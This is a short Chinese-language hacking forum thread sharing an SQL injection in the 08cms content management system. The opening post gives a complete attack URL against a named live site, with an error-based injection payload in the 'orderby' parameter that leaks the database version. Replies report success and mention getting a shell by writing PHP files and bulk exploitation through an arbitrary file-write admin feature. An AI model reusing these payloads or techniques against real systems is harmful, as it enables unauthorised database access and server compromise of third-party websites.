08cms 注入漏洞

Jumbo

以前看到的，测试下官网还可以。网上看到还没有，大牛们估计早收好了。
可能是没有开源漏洞挺多的。
http://www.8090sec.com/search.ph ... rderby=aid%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&addno=0&ccid8=366
众说纷纭：测试成功。>>>>>> 貌似还有个编辑器的漏洞。。 >>>>>>  iis6和apache可以编辑模板。其他没试过。 >>>>> 刚碰到了个08cms， 感谢分享。>>>>> 日烂了，getshell 哪里需要解析。直接写入PHP文件 >>>>>> 日烂了，getshell 哪里需要解析。直接写入PHP文件 >>>>> 偶尔碰到过,房产版的有的已经补了,不过官方的没去看过... >>>>> 不开源的估计东东很多。 >>>>>  后台那里有个地方可以把文件名 写入到任意目录任意文件的。去年批量过一次，你看下是先写入后修改还是直接新建。而且08cms分很多个类型。

沙发！沙发!

学习了，谢谢分享、、、